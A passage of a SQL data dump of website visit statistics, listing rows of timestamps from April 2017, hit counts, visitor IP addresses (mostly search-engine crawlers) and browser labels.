9.22','chrome'),(101689,1492531692,1,1,0,0,'217.69.133.231','other'),(101690,1492532144,1,1,0,0,'164.132.161.53','other'),(101691,1492532202,2,2,0,0,'69.36.182.10','other'),(101692,1492532209,1,1,0,0,'216.244.66.237','other'),(101693,1492532883,1,1,0,0,'46.219.217.112','chrome'),(101694,1492533181,1,1,0,0,'164.132.162.158','other'),(101695,1492533262,1,1,0,0,'164.132.161.95','other'),(101696,1492533471,1,1,0,0,'217.182.132.86','other'),(101697,1492533636,1,1,0,0,'51.255.71.110','other'),(101698,1492533990,1,0,1,0,'66.249.66.87',''),(101699,1492534268,1,1,0,0,'164.132.161.41','other'),(101700,1492534380,1,1,0,0,'109.134.169.44','chrome'),(101701,1492534472,1,1,0,0,'51.255.65.48','other'),(101702,1492534683,1,1,0,0,'46.219.243.85','chrome'),(101703,1492534925,1,1,0,0,'216.244.66.237','other'),(101704,1492535401,1,1,0,0,'164.132.161.36','other'),(101705,1492535453,2,2,0,0,'91.200.12.15','msie'),(101706,1492536427,1,1,0,0,'217.69.133.232','other'),(101707,1492536483,1,1,0,0,'46.219.243.85','chrome'),(101708,1492536491,1,1,0,0,'51.255.65.9','other'),(101709,1492537107,1,1,0,0,'91.196.178.165','firefox'),(101710,1492537769,1,1,0,0,'51.255.65.35','other'),(101711,1492537806,1,1,0,0,'91.124.83.38','chrome'),(101712,1492537930,1,1,0,0,'164.132.161.90','other'),(101713,1492538283,1,1,0,0,'46.219.217.112','chrome'),(101714,1492539279,1,1,0,0,'141.8.142.164','other'),(101715,1492539281,1,1,0,0,'51.255.71.133','other'),(101716,1492539345,1,1,0,0,'5.255.253.63','other'),(101717,1492539378,1,1,0,0,'141.8.142.154','other'),(101718,1492539949,1,1,0,0,'91.209.11.236','other'),(101719,1492540083,1,1,0,0,'46.219.217.112','chrome'),(101720,1492540735,1,1,0,0,'217.182.132.77','other'),(101721,1492540972,1,1,0,0,'217.182.132.193','other'),(101722,1492541390,1,1,0,0,'137.74.203.194','other'),(101723,1492541575,2,2,0,0,'51.255.65.18','other'),(101724,1492541805,1,1,0,0,'91.196.178.163','chrome'),(101725,1492541883,1,1,0,0,'46.219.217.112','chrome'),(101726,1492542182,1,1,0,0,'91.196.178.33','chrome'),(101727,1492542261,1,1,0,0,'8.29.198.25','other'),(101728,1492542295,1,1,0,0,'178.219.88.13','chrome'),(101729,1492542428,1,1,0,0,'141.8.142.38','other'),(101730,1492542444,1,1,0,0,'95.24.235.80','msie'),(101731,1492542547,1,0,1,0,'66.249.76.108',''),(101732,1492542914,1,1,0,0,'51.255.65.36','other'),(101733,1492543131,1,0,1,0,'66.249.66.87',''),(101734,1492543364,1,1,0,0,'217.182.132.154','other'),(101735,1492543440,1,1,0,0,'51.255.65.42','other'),(101736,1492543683,1,1,0,0,'46.219.217.112','chrome'),(101737,1492544019,1,1,0,0,'95.108.213.34','other'),(101738,1492544123,1,1,0,0,'51.255.65.94','other'),(101739,1492544202,1,0,1,0,'66.249.76.107',''),(101740,1492544332,1,0,1,0,'66.249.76.28',''),(101741,1492544607,1,1,0,0,'217.182.132.148','other'),(101742,1492544710,1,1,0,0,'164.132.161.56','other'),(101743,1492545306,1,1,0,0,'164.132.161.22','other'),(101744,1492545483,1,1,0,0,'46.219.217.112','chrome'),(101745,1492546253,1,0,1,0,'66.249.76.27',''),(101746,1492546365,1,1,0,0,'95.108.213.34','other'),(101747,1492546670,1,1,0,0,'164.132.161.80','other'),(101748,1492547283,1,1,0,0,'46.219.243.134','chrome'),(101749,1492547344,1,1,0,0,'52.86.176.3','other'),(101750,1492548022,1,1,0,0,'180.76.15.9','other'),(101751,1492548145,1,1,0,0,'164.132.161.75','other'),(101752,1492549083,1,1,0,0,'46.219.243.134','chrome'),(101753,1492549228,1,1,0,0,'217.182.132.67','other'),(101754,1492550292,1,1,0,0,'217.182.132.83','other'),(101755,1492550662,1,1,0,0,'137.74.207.164','other'),(101756,1492550883,1,1,0,0,'46.219.243.134','chrome'),(101757,1492550983,1,1,0,0,'51.255.65.83','other'),(101758,1492551118,1,1,0,0,'51.255.65.56','other'),(101759,1492551198,1,1,0,0,'164.132.161.43','other'),(101760,1492552693,1,1,0,0,'46.219.243.134','chrome'),(101761,1492552774,1,1,0,0,'164.132.161.74','other'),(101762,1492553085,1,1,0,0,'8.29.198.27','other'),(101763,1492553138,1,1,0,0,'216.244.66.237','other'),(101764,1492553666,1,1,0,0,'164.132.161.55','other'),(101765,1492553922,1,1,0,0,'51.255.65.23','other'),(101766,1492554483,1,1,0,0,'46.219.243.134','chrome'),(101767,1492555286,1,1,0,0,'51.255.65.30','other'),(101768,1492555395,1,1,0,0,'164.132.161.59','other'),(101769,1492555951,1,1,0,0,'217.69.133.5','other'),(101770,1492556283,1,1,0,0,'46.219.243.134','chrome'),(101771,1492556674,1,1,0,0,'51.255.65.60','other'),(101772,1492557332,1,1,0,0,'217.182.132.29','other'),(101773,1492557355,1,1,0,0,'51.255.65.97','other'),(101774,1492557369,1,1,0,0,'217.182.132.153','other'),(101775,1492557533,1,1,0,0,'151.80.27.116','other'),(101776,1492558083,1,1,0,0,'46.219.243.134','chrome'),(101777,1492558318,1,1,0,0,'180.76.15.11','other'),(101778,1492558403,1,1,0,0,'51.255.65.51','other'),(101779,1492558685,1,1,0,0,'217.182.132.15','other'),(101780,1492558718,1,1,0,0,'217.182.132.18','other'),(101781,1492558916,1,1,0,0,'66.249.66.84','chrome'),(101782,1492559018,1,1,0,0,'217.182.132.171','other'),(101783,1492559151,1,1,0,0,'208.43.225.85','other'),(101784,1492559676,1,1,0,0,'164.132.161.35','other'),(101785,1492559883,1,1,0,0,'46.219.243.134','chrome'),(101786,1492560360,1,1,0,0,'217.69.136.203','other'),(101787,1492561472,1,1,0,0,'51.255.65.78','other'),(101788,1492561683,1,1,0,0,'46.219.243.134','chrome'),(101789,1492561933,1,1,0,0,'164.132.161.9','other'),(101790,1492562157,1,1,0,0,'51.255.65.88','other'),(101791,1492562915,1,1,0,0,'217.69.133.203','other'),(101792,1492563298,1,1,0,0,'217.182.132.151','other'),(101793,1492563483,1,1,0,0,'46.219.243.134','chrome'),(101794,1492563506,1,1,0,0,'217.69.136.205','other'),(101795,1492563507,1,1,0,0,'217.69.136.209','other'),(101796,1492563856,1,1,0,0,'51.255.65.47','other'),(101797,1492563905,1,1,0,0,'8.29.198.25','other'),(101798,1492564111,1,1,0,0,'137.74.207.188','other'),(101799,1492564331,1,1,0,0,'217.182.132.146','other'),(101800,1492564604,1,1,0,0,'164.132.161.74','other'),(101801,1492564639,1,1,0,0,'217.182.132.153','other'),(101802,1492564643,1,1,0,0,'217.182.132.93','other'),(101803,1492565166,1,1,0,0,'51.255.65.22','other'),(101804,1492565283,1,1,0,0,'46.219.243.134','chrome'),(101805,1492565812,1,1,0,0,'51.255.65.57','other'),(101806,1492566508,1,1,0,0,'217.182.132.94','other'),(101807,1492566821,1,1,0,0,'51.255.65.94','other'),(101808,1492567029,1,0,1,0,'66.249.66.180',''),(101809,1492567083,1,1,0,0,'46.219.243.134','chrome'),(101810,1492567300,1,0,1,0,'66.249.66.81',''),(101811,1492567752,1,1,0,0,'51.255.65.43','other'),(101812,1492568013,1,1,0,0,'164.132.161.89','other'),(101813,1492568883,1,1,0,0,'46.219.243.134','chrome'),(101814,1492569256,1,1,0,0,'164.132.161.77','other'),(101815,1492569405,1,0,1,0,'40.77.167.57',''),(101816,1492570683,1,1,0,0,'46.219.243.134','chrome'),(101817,1492570740,1,1,0,0,'217.182.132.31','other'),(101818,1492572105,1,1,0,0,'51.255.65.52','other'),(101819,1492572133,1,1,0,0,'51.255.65.48','other'),(101820,1492572483,1,1,0,0,'46.219.243.134','chrome'),(101821,1492573922,1,1,0,0,'164.132.162.188','other'),(101822,1492574283,1,1,0,0,'46.219.243.134','chrome'),(101823,1492574435,1,0,1,0,'66.249.76.109',''),(101824,1492574727,1,1,0,0,'8.29.198.26','other'),(101825,1492575030,1,1,0,0,'137.74.207.114','other'),(101826,1492575463,1,0,1,0,'66.249.76.29',''),(101827,1492575863,1,1,0,0,'51.255.65.7','other'),(101828,1492576083,1,1,0,0,'46.219.243.134','chrome'),(101829,1492576414,1,1,0,0,'164.132.161.80','other'),(101830,1492576504,1,1,0,0,'164.132.161.69','other'),(101831,1492577008,1,1,0,0,'217.182.132.6','other'),(101832,1492577295,1,1,0,0,'217.182.132.30','other'),(101833,1492577552,1,1,0,0,'51.255.65.43','other'),(101834,1492577780,1,1,0,0,'91.196.178.67','firefox'),(101835,1492577883,1,1,0,0,'46.219.243.134','chrome'),(101836,1492578072,1,1,0,0,'78.111.187.210','chrome'),(101837,1492578180,1,1,0,0,'180.76.15.5','other'),(101838,1492579135,1,1,0,0,'217.182.132.22','other'),(101839,1492579469,1,1,0,0,'216.244.66.237','other'),(101840,1492579683,1,1,0,0,'46.219.243.134','chrome'),(101841,1492579953,1,1,0,0,'217.182.132.170','other'),(101842,1492580956,1,1,0,0,'217.182.132.181','other'),(101843,1492581098,1,1,0,0,'217.182.132.55','other'),(101844,1492581483,1,1,0,0,'46.219.243.134','chrome'),(101845,1492581511,1,1,0,0,'217.182.132.78','other'),(101846,1492581515,1,1,0,0,'217.182.132.33','other'),(101847,1492581517,1,1,0,0,'217.69.133.215','other'),(101848,1492581827,1,1,0,0,'91.196.178.68','chrome'),(101849,1492582174,1,1,0,0,'164.132.161.90','other'),(101850,1492582210,1,1,0,0,'51.255.71.115','other'),(101851,1492582525,1,1,0,0,'217.182.132.181','other'),(101852,1492582891,59,59,0,0,'46.4.58.130','other'),(101853,1492583283,1,1,0,0,'46.219.243.134','chrome'),(101854,1492583480,1,1,0,0,'51.255.65.87','other'),(101855,1492583503,1,1,0,0,'217.182.132.32','other'),(101856,1492583546,1,1,0,0,'91.196.178.71','firefox'),(101857,1492583727,1,1,0,0,'217.182.132.25','other'),(101858,1492584168,1,1,0,0,'46.188.81.69','msie'),(101859,1492584568,1,1,0,0,'216.244.66.237','other'),(101860,1492585083,1,1,0,0,'46.219.243.134','chrome'),(101861,1492585173,1,1,0,0,'82.207.91.234','firefox'),(101862,1492585353,1,1,0,0,'217.182.132.20','other'),(101863,1492585548,1,1,0,0,'8.29.198.27','other'),(101864,1492585739,1,1,0,0,'91.196.178.103','firefox'),(101865,1492585792,1,1,0,0,'51.255.65.82','other'),(101866,1492586177,1,1,0,0,'130.180.216.14','firefox'),(101867,1492586195,1,0,1,0,'66.249.66.81',''),(101868,1492586328,2,2,0,0,'51.255.71.100','other'),(101869,1492586420,1,1,0,0,'217.69.133.226','other'),(101870,1492586633,1,1,0,0,'164.132.161.37','other'),(101871,1492586884,1,1,0,0,'46.219.243.134','chrome'),(101872,1492587053,1,1,0,0,'5.255.253.43','other'),(101873,1492587056,1,1,0,0,'5.255.253.63','other'),(101874,1492587061,1,1,0,0,'95.108.179.15','other'),(101875,1492587064,2,2,0,0,'95.108.213.7','other'),(101876,1492587068,1,1,0,0,'141.8.142.154','other'),(101877,1492587107,1,1,0,0,'51.255.71.132','other'),(101878,1492587128,1,1,0,0,'51.255.65.3','other'),(101879,1492587548,1,0,1,0,'66.249.76.107',''),(101880,1492587792,1,1,0,0,'91.196.178.67','firefox'),(101881,1492588183,1,0,1,0,'66.249.66.180',''),(101882,1492588684,1,1,0,0,'46.219.243.134','chrome'),(101883,1492589033,1,1,0,0,'217.69.133.69','other'),(101884,1492589055,1,1,0,0,'217.69.136.209','other'),(101885,1492589600,1,1,0,0,'91.124.83.20','chrome'),(101886,1492589655,1,1,0,0,'216.244.66.237','other'),(101887,1492589882,1,1,0,0,'178.95.66.40','firefox'),(101888,1492590487,1,1,0,0,'46.219.243.134','chrome'),(101889,1492591407,1,1,0,0,'52.86.176.3','other'),(101890,1492591660,1,1,0,0,'193.194.127.207','chrome'),(101891,1492592133,1,0,1,0,'40.77.167.73',''),(101892,1492592271,1,1,0,0,'193.19.152.14','chrome'),(101893,1492592284,1,1,0,0,'46.219.243.134','chrome'),(101894,1492592311,1,1,0,0,'66.249.76.109','chrome'),(101895,1492593056,1,1,0,0,'37.52.20.80','firefox'),(101896,1492593710,1,1,0,0,'37.9.113.43','other'),(101897,1492593807,1,0,1,0,'66.249.76.29',''),(101898,1492594084,1,1,0,0,'46.219.243.134','chrome'),(101899,1492594496,1,1,0,0,'164.132.161.81','other'),(101900,1492595843,1,1,0,0,'217.182.132.36','other'),(101901,1492595868,1,1,0,0,'51.255.65.54','other'),(101902,1492595884,1,1,0,0,'46.219.243.134','chrome'),(101903,1492596049,1,1,0,0,'164.132.161.95','other'),(101904,1492596320,1,1,0,0,'217.69.136.210','other'),(101905,1492596374,1,1,0,0,'8.29.198.25','other'),(101906,1492596504,1,1,0,0,'51.255.65.68','other'),(101907,1492596660,1,1,0,0,'66.249.76.29','chrome'),(101908,1492596950,1,1,0,0,'91.209.11.236','other'),(101909,1492597088,2,2,0,0,'5.105.62.112','chrome'),(101910,1492597169,1,1,0,0,'176.105.104.186','chrome'),(101911,1492597224,1,1,0,0,'217.182.132.171','other'),(101912,1492597684,1,1,0,0,'46.219.243.134','chrome'),(101913,1492597923,1,1,0,0,'94.153.162.230','chrome'),(101914,1492598856,1,1,0,0,'91.196.178.65','firefox'),(101915,1492599071,1,1,0,0,'217.182.132.156','other'),(101916,1492599484,1,1,0,0,'46.219.243.134','chrome'),(101917,1492599865,1,1,0,0,'51.255.71.115','other'),(101918,1492599895,1,1,0,0,'91.196.178.162','chrome'),(101919,1492599917,1,1,0,0,'178.154.149.3','other'),(101920,1492600283,1,1,0,0,'178.154.189.29','other'),(101921,1492600356,1,0,1,0,'66.249.76.29',''),(101922,1492600368,1,1,0,0,'164.132.162.160','other'),(101923,1492600594,1,1,0,0,'164.132.161.5','other'),(101924,1492600753,1,1,0,0,'95.132.84.248','chrome'),(101925,1492600941,1,1,0,0,'91.196.178.97','chrome'),(101926,1492600980,1,1,0,0,'91.196.178.72','other'),(101927,1492601283,1,1,0,0,'51.255.65.88','other'),(101928,1492601284,1,1,0,0,'46.219.243.134','chrome'),(101929,1492601369,1,1,0,0,'91.196.177.26','chrome'),(101930,1492602107,1,1,0,0,'164.132.161.76','other'),(101931,1492602310,1,1,0,0,'217.69.133.9','other'),(101932,1492602355,1,1,0,0,'193.19.152.14','chrome'),(101933,1492603017,1,1,0,0,'91.196.178.166','chrome'),(101934,1492603308,1,1,0,0,'137.74.207.114','other'),(101935,1492603474,1,1,0,0,'193.19.152.14','chrome'),(101936,1492603545,1,1,0,0,'164.132.161.5','other'),(101937,1492603669,1,1,0,0,'164.132.161.70','other'),(101938,1492603716,1,0,1,0,'66.249.76.27',''),(101939,1492603984,1,1,0,0,'46.219.243.134','chrome'),(101940,1492604409,1,1,0,0,'217.182.132.73','other'),(101941,1492604698,1,1,0,0,'51.255.65.38','other'),(101942,1492604968,1,0,1,0,'66.249.76.27',''),(101943,1492605326,1,1,0,0,'176.102.213.29','chrome'),(101944,1492605726,1,1,0,0,'51.255.65.59','other'),(101945,1492605784,1,1,0,0,'46.219.243.134','chrome'),(101946,1492605830,1,1,0,0,'141.8.142.9','other'),(101947,1492606130,1,1,0,0,'217.182.132.32','other'),(101948,1492606189,1,1,0,0,'66.102.9.61','chrome'),(101949,1492606372,1,1,0,0,'91.196.178.71','chrome'),(101950,1492606752,1,1,0,0,'91.196.178.99','chrome'),(101951,1492606934,1,1,0,0,'164.132.161.92','other'),(101952,1492607167,1,1,0,0,'51.255.65.41','other'),(101953,1492607190,1,1,0,0,'8.29.198.26','other'),(101954,1492607584,1,1,0,0,'46.219.243.134','chrome'),(101955,1492607606,1,1,0,0,'51.255.71.129','other'),(101956,1492607624,1,1,0,0,'195.49.151.99','chrome'),(101957,1492607755,1,1,0,0,'217.182.132.67','other'),(101958,1492608117,1,1,0,0,'91.196.178.135','firefox'),(101959,1492608384,1,1,0,0,'193.19.152.14','chrome'),(101960,1492608530,1,1,0,0,'91.196.177.46','firefox'),(101961,1492608561,1,0,1,0,'40.77.167.11',''),(101962,1492608662,1,1,0,0,'91.196.177.42','chrome'),(101963,1492608810,1,1,0,0,'95.132.62.223','firefox'),(101964,1492609384,1,1,0,0,'46.219.243.134','chrome'),(101965,1492609932,1,0,1,0,'66.249.66.183',''),(101966,1492609995,1,1,0,0,'164.132.161.46','other'),(101967,1492610399,1,1,0,0,'217.69.133.68','other'),(101968,1492610457,1,0,1,0,'40.77.167.5',''),(101969,1492610840,1,1,0,0,'91.196.178.134','firefox'),(101970,1492610901,1,0,1,0,'68.180.228.49',''),(101971,1492610939,1,1,0,0,'178.95.66.180','chrome'),(101972,1492611184,1,1,0,0,'46.219.243.134','chrome'),(101973,1492611416,1,1,0,0,'91.196.178.67','firefox'),(101974,1492611650,1,1,0,0,'91.196.178.66','firefox'),(101975,1492611691,1,1,0,0,'164.132.161.46','other'),(101976,1492611838,1,1,0,0,'217.182.132.23','other'),(101977,1492612091,1,1,0,0,'217.182.132.72','other'),(101978,1492612780,1,1,0,0,'164.132.161.49','other'),(101979,1492612966,1,1,0,0,'82.145.221.24','opera'),(101980,1492612984,1,1,0,0,'46.219.243.134','chrome'),(101981,1492612994,1,1,0,0,'51.255.71.123','other'),(101982,1492613140,1,1,0,0,'164.132.162.187','other'),(101983,1492613428,1,1,0,0,'217.182.132.57','other'),(101984,1492614023,1,1,0,0,'164.132.161.92','other'),(101985,1492614309,1,1,0,0,'216.244.66.237','other'),(101986,1492614688,1,1,0,0,'51.255.71.115','other'),(101987,1492614784,1,1,0,0,'46.219.243.134','chrome'),(101988,1492615150,1,1,0,0,'137.74.207.109','other'),(101989,1492615682,1,1,0,0,'51.255.65.60','other'),(101990,1492616044,1,1,0,0,'164.132.161.62','other'),(101991,1492616584,1,1,0,0,'46.219.243.134','chrome'),(101992,1492616683,1,1,0,0,'51.255.71.116','other'),(101993,1492616749,1,1,0,0,'180.76.15.154','other'),(101994,1492616839,1,1,0,0,'217.69.133.234','other'),(101995,1492616843,1,1,0,0,'51.255.65.77','other'),(101996,1492617335,1,1,0,0,'217.182.132.54','other'),(101997,1492617593,1,1,0,0,'82.145.223.56','opera'),(101998,1492617917,1,1,0,0,'217.182.132.241','other'),(101999,1492618016,1,1,0,0,'8.29.198.25','other'),(102000,1492618137,1,1,0,0,'137.74.207.108','other'),(102001,1492618383,1,1,0,0,'51.255.65.48','other'),(102002,1492618384,1,1,0,0,'46.219.243.134','chrome'),(102003,1492618732,1,1,0,0,'217.182.132.177','other'),(102004,1492619077,1,1,0,0,'164.132.162.160','other'),(102005,1492619622,1,1,0,0,'217.182.132.170','other'),(102006,1492619633,1,1,0,0,'137.74.207.116','other'),(102007,1492619666,1,1,0,0,'51.255.71.119','other'),(102008,1492620005,1,1,0,0,'180.76.15.13','other'),(102009,1492620184,1,1,0,0,'46.219.243.134','chrome'),(102010,1492620195,1,1,0,0,'164.132.161.41','other'),(102011,1492620760,1,1,0,0,'137.74.207.170','other'),(102012,1492620785,1,1,0,0,'217.182.132.22','other'),(102013,1492620810,1,1,0,0,'217.182.132.156','other'),(102014,1492621296,1,1,0,0,'51.255.71.110','other'),(102015,1492621984,1,1,0,0,'46.219.243.134','chrome'),(102016,1492622076,1,1,0,0,'217.182.132.79','other'),(102017,1492622196,1,1,0,0,'217.182.132.31','other'),(102018,1492622233,1,0,1,0,'66.249.76.107',''),(102019,1492622979,1,1,0,0,'164.132.161.52','other'),(102020,1492623784,1,1,0,0,'46.219.243.134','chrome'),(102021,1492624084,1,1,0,0,'178.92.170.188','chrome'),(102022,1492625244,1,1,0,0,'164.132.161.38','other'),(102023,1492625917,1,1,0,0,'217.182.132.176','other'),(102024,1492626206,2,2,0,0,'216.244.66.233','other'),(102025,1492626492,1,1,0,0,'217.69.136.203','other'),(102026,1492627706,1,1,0,0,'217.182.132.24','other'),(102027,1492627720,1,1,0,0,'51.255.65.86','other'),(102028,1492627815,1,1,0,0,'217.182.132.95','other'),(102029,1492628265,1,0,1,0,'66.249.66.87',''),(102030,1492628525,1,1,0,0,'51.255.65.37','other'),(102031,1492628643,1,0,1,0,'40.77.167.11',''),(102032,1492628814,1,0,1,0,'66.249.76.107',''),(102033,1492628837,1,1,0,0,'8.29.198.26','other'),(102034,1492628896,1,1,0,0,'51.255.71.131','other'),(102035,1492629317,1,1,0,0,'51.255.71.128','other'),(102036,1492629522,1,1,0,0,'217.69.133.215','other'),(102037,1492629527,1,1,0,0,'217.182.132.61','other'),(102038,1492630758,1,0,1,0,'66.249.76.109',''),(102039,1492630989,1,1,0,0,'217.182.132.37','other'),(102040,1492631571,1,1,0,0,'216.244.66.233','other'),(102041,1492631981,1,0,1,0,'66.249.66.177',''),(102042,1492632045,1,1,0,0,'217.182.132.27','other'),(102043,1492632077,1,1,0,0,'217.182.132.58','other'),(102044,1492632524,1,1,0,0,'51.255.71.116','other'),(102045,1492633594,1,1,0,0,'164.132.161.35','other'),(102046,1492634335,1,1,0,0,'216.244.66.233','other'),(102047,1492634940,1,1,0,0,'51.255.65.10','other'),(102048,1492635035,1,1,0,0,'164.132.161.54','other'),(102049,1492635224,1,1,0,0,'217.182.132.179','other'),(102050,1492635680,1,1,0,0,'51.255.71.114','other'),(102051,1492637610,1,0,1,0,'66.249.76.108',''),(102052,1492637646,1,1,0,0,'51.255.65.56','other'),(102053,1492638629,1,1,0,0,'46.39.64.57','firefox'),(102054,1492638824,1,1,0,0,'51.255.65.25','other'),(102055,1492638982,1,1,0,0,'217.182.132.66','other'),(102056,1492639619,1,1,0,0,'137.74.207.164','other'),(102057,1492639664,1,1,0,0,'8.29.198.27','other'),(102058,1492639741,2,2,0,0,'216.244.66.233','other'),(102059,1492639754,1,1,0,0,'164.132.162.164','other'),(102060,1492640942,1,1,0,0,'164.132.161.62','other'),(102061,1492641661,1,1,0,0,'137.74.207.108','other'),(102062,1492642109,1,1,0,0,'51.255.65.89','other'),(102063,1492642303,1,1,0,0,'164.132.161.59','other'),(102064,1492642309,1,1,0,0,'164.132.161.16','other'),(102065,1492642580,1,1,0,0,'216.244.66.233','other'),(102066,1492642658,1,1,0,0,'217.69.133.216','other'),(102067,1492642766,1,1,0,0,'164.132.161.94','other'),(102068,1492642813,1,0,1,0,'66.249.76.29',''),(102069,1492642909,1,1,0,0,'66.249.76.107','chrome'),(102070,1492643055,1,1,0,0,'51.255.65.55','other'),(102071,1492643741,1,1,0,0,'217.182.132.240','other'),(102072,1492643840,1,1,0,0,'51.255.71.118','other'),(102073,1492644460,1,1,0,0,'217.69.133.225','other'),(102074,1492644682,1,1,0,0,'217.182.132.151','other'),(102075,1492644746,1,1,0,0,'164.132.161.88','other'),(102076,1492644788,1,0,1,0,'66.249.66.87',''),(102077,1492644961,1,1,0,0,'217.182.132.190','other'),(102078,1492645277,1,1,0,0,'216.244.66.233','other'),(102079,1492645328,1,1,0,0,'51.255.65.71','other'),(102080,1492646144,1,1,0,0,'217.69.133.2','other'),(102081,1492646206,1,1,0,0,'217.182.132.30','other'),(102082,1492647064,1,1,0,0,'95.108.179.15','other'),(102083,1492647076,1,1,0,0,'164.132.161.61','other'),(102084,1492647080,1,1,0,0,'95.108.213.34','other'),(102085,1492647094,1,1,0,0,'141.8.142.15','other'),(102086,1492647198,1,1,0,0,'5.255.253.58','other'),(102087,1492648043,1,1,0,0,'164.132.161.15','other'),(102088,1492648124,1,1,0,0,'164.132.162.154','other'),(102089,1492648154,1,1,0,0,'66.249.66.180','chrome'),(102090,1492648167,1,1,0,0,'217.69.136.204','other'),(102091,1492648669,1,1,0,0,'217.69.133.230','other'),(102092,1492649025,1,1,0,0,'141.8.142.15','other'),(102093,1492649103,1,1,0,0,'217.182.132.146','other'),(102094,1492649669,2,2,0,0,'88.198.66.230','other'),(102095,1492649777,1,0,1,0,'66.249.76.28',''),(102096,1492650429,1,1,0,0,'164.132.161.71','other'),(102097,1492650487,1,1,0,0,'8.29.198.27','other'),(102098,1492650725,1,0,1,0,'66.249.76.107',''),(102099,1492651672,1,0,1,0,'40.77.167.58',''),(102100,1492651939,1,1,0,0,'95.108.213.34','other'),(102101,1492652404,1,1,0,0,'217.182.132.187','other'),(102102,1492653103,1,1,0,0,'216.244.66.233','other'),(102103,1492653260,1,1,0,0,'51.255.65.35','other'),(102104,1492653431,1,1,0,0,'164.132.161.21','other'),(102105,1492653574,1,1,0,0,'95.108.179.15','other'),(102106,1492653623,1,1,0,0,'141.8.142.154','other'),(102107,1492653657,1,1,0,0,'178.154.200.45','other'),(102108,1492653932,1,1,0,0,'5.255.253.83','other'),(102109,1492654053,1,0,1,0,'40.77.167.14',''),(102110,1492654422,1,0,1,0,'66.249.76.29',''),(102111,1492654523,1,1,0,0,'51.255.65.67','other'),(102112,1492656021,1,1,0,0,'95.108.179.15','other'),(102113,1492656030,1,1,0,0,'141.8.142.164','other'),(102114,1492656039,1,1,0,0,'95.108.213.34','other'),(102115,1492656050,1,1,0,0,'141.8.142.15','other'),(102116,1492656056,2,2,0,0,'141.8.142.154','other'),(102117,1492656619,1,1,0,0,'164.132.161.8','other'),(102118,1492656854,1,1,0,0,'51.255.65.9','other'),(102119,1492656948,1,1,0,0,'164.132.161.17','other'),(102120,1492657745,1,1,0,0,'51.255.65.59','other'),(102121,1492657771,40,40,0,0,'89.82.218.234','other'),(102122,1492658369,1,1,0,0,'51.255.65.82','other'),(102123,1492658530,1,1,0,0,'51.255.65.69','other'),(102124,1492658658,1,1,0,0,'164.132.161.39','other'),(102125,1492660040,1,1,0,0,'217.182.132.32','other'),(102126,1492660414,6,6,0,0,'95.108.213.34','other'),(102127,1492660417,1,1,0,0,'5.255.253.63','other'),(102128,1492660423,1,1,0,0,'178.154.149.1','other'),(102129,1492660424,1,1,0,0,'178.154.189.29','other'),(102130,1492660435,2,2,0,0,'141.8.142.15','other'),(102131,1492660441,6,6,0,0,'141.8.142.164','other'),(102132,1492660444,3,3,0,0,'141.8.142.154','other'),(102133,1492660453,3,3,0,0,'95.108.179.15','other'),(102134,1492660877,1,1,0,0,'164.132.161.23','other'),(102135,1492661039,1,1,0,0,'164.132.161.9','other'),(102136,1492661306,1,1,0,0,'8.29.198.26','other'),(102137,1492661554,1,1,0,0,'51.255.65.60','other'),(102138,1492661714,1,1,0,0,'217.69.136.203','other'),(102139,1492662256,1,1,0,0,'51.255.65.56','other'),(102140,1492662290,1,0,1,0,'66.249.66.177',''),(102141,1492662693,1,1,0,0,'137.74.203.194','other'),(102142,1492663446,1,1,0,0,'91.196.178.67','firefox'),(102143,1492663519,1,1,0,0,'51.255.65.64','other'),(102144,1492664099,1,1,0,0,'51.255.65.77','other'),(102145,1492664252,1,1,0,0,'164.132.162.156','other'),(102146,1492664740,2,2,0,0,'91.196.178.72','firefox'),(102147,1492665582,1,1,0,0,'217.182.132.78','other'),(102148,1492665718,1,1,0,0,'141.8.142.15','other'),(102149,1492665727,2,2,0,0,'95.108.179.15','other'),(102150,1492665890,1,1,0,0,'216.244.66.233','other'),(102151,1492667207,2,2,0,0,'91.196.178.71','chrome'),(102152,1492667470,1,1,0,0,'51.255.65.88','other'),(102153,1492667705,1,1,0,0,'164.132.161.42','other'),(102154,1492667763,1,1,0,0,'51.255.65.58','other'),(102155,1492668204,1,0,1,0,'66.249.66.81',''),(102156,1492668800,1,1,0,0,'91.196.179.25','chrome'),(102157,1492668813,1,1,0,0,'141.8.132.72','other'),(102158,1492668886,2,2,0,0,'216.244.66.233','other'),(102159,1492669206,1,1,0,0,'40.77.167.14','other'),(102160,1492669467,1,1,0,0,'37.53.139.65','chrome'),(102161,1492669505,2,2,0,0,'66.249.83.74','chrome'),(102162,1492669532,10,10,0,0,'69.30.234.2','other'),(102163,1492669679,1,1,0,0,'66.249.83.75','chrome'),(102164,1492669725,1,1,0,0,'164.132.161.97','other'),(102165,1492669795,1,1,0,0,'217.69.133.9','other'),(102166,1492670093,1,1,0,0,'91.196.178.72','firefox'),(102167,1492670239,1,0,1,0,'66.249.76.107',''),(102168,1492670521,1,1,0,0,'217.182.132.90','other'),(102169,1492670963,1,1,0,0,'164.132.161.79','other'),(102170,1492672130,1,1,0,0,'8.29.198.27','other'),(102171,1492672570,2,2,0,0,'151.80.41.169','other'),(102172,1492672910,1,1,0,0,'51.255.65.55','other'),(102173,1492672934,1,0,1,0,'66.249.76.109',''),(102174,1492673087,1,1,0,0,'95.132.26.152','firefox'),(102175,1492673138,1,1,0,0,'51.255.65.43','other'),(102176,1492673432,1,1,0,0,'82.207.91.234','firefox'),(102177,1492673854,1,0,1,0,'66.249.76.108',''),(102178,1492674216,1,1,0,0,'51.255.65.49','other'),(102179,1492675424,1,1,0,0,'164.132.161.82','other'),(102180,1492675950,1,1,0,0,'51.255.65.78','other'),(102181,1492676530,1,1,0,0,'46.219.243.134','chrome'),(102182,1492676850,1,1,0,0,'217.182.132.94','other'),(102183,1492676948,1,1,0,0,'207.46.13.94','other'),(102184,1492677076,1,0,1,0,'66.249.76.29',''),(102185,1492677137,1,1,0,0,'91.196.177.26','chrome'),(102186,1492677295,1,0,1,0,'66.249.76.108',''),(102187,1492677320,1,1,0,0,'164.132.161.32','other'),(102188,1492677500,1,1,0,0,'46.219.33.172','firefox'),(102189,1492677584,1,1,0,0,'91.196.178.72','chrome'),(102190,1492677766,1,1,0,0,'212.66.48.36','chrome'),(102191,1492677825,1,1,0,0,'91.196.178.72','firefox'),(102192,1492677862,1,1,0,0,'141.8.142.97','other'),(102193,1492677942,1,1,0,0,'178.93.245.145','chrome'),(102194,1492678437,1,1,0,0,'95.135.157.60','chrome'),(102195,1492678644,1,1,0,0,'217.182.132.36','other'),(102196,1492678702,1,1,0,0,'178.95.66.40','firefox'),(102197,1492678803,1,1,0,0,'217.182.132.35','other'),(102198,1492678827,1,0,1,0,'66.249.66.81','')